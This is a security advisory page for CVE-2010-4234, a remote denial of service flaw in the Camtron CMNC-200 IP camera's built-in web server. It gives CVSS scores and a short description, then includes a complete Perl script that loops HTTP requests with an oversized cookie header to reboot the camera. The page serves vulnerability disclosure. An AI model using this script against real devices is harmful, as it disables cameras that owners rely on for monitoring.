Camtron CMNC-200 IP Camera Denial of Service Vulnerability

2010.11.18
Risk: High
Local: No
Remote: Yes
CWE: CWE-399


CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

Finding 5: Camera Denial of Service CVE: CVE-2010-4234 The CMNC-200 IP Camera has a built-in web server that is vulnerable to denial of service attacks. Sending multiple requests in parallel to the web server may cause the camera to reboot. Requests with long cookie header makes the IP camera reboot a few seconds faster, however the same can be accomplished with requests of any size. The example code below is able to reboot the IP cameras in less than a minute in a local network. #!/usr/bin/perl use LWP::UserAgent; while (1 == 1){ $ua = new LWP::UserAgent; $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6)"); $req = HTTP::Request->new(GET => 'http://192.168.10.100'); $req->header(Accept => "text/xml,application/xml,application/xhtml+xml,text/html ;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"); $req->header("Keep-Alive" => 0); $req->header(Connection => "close"); $req->header("If-Modified-Since" => "Mon, 12 Oct 2009 02:06:34 GMT"); $req->header(Cookie => "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); my $res = $ua->request($req); }

References:

https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt
http://www.securityfocus.com/archive/1/archive/1/514753/100/0/threaded
http://www.exploit-db.com/exploits/15508


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top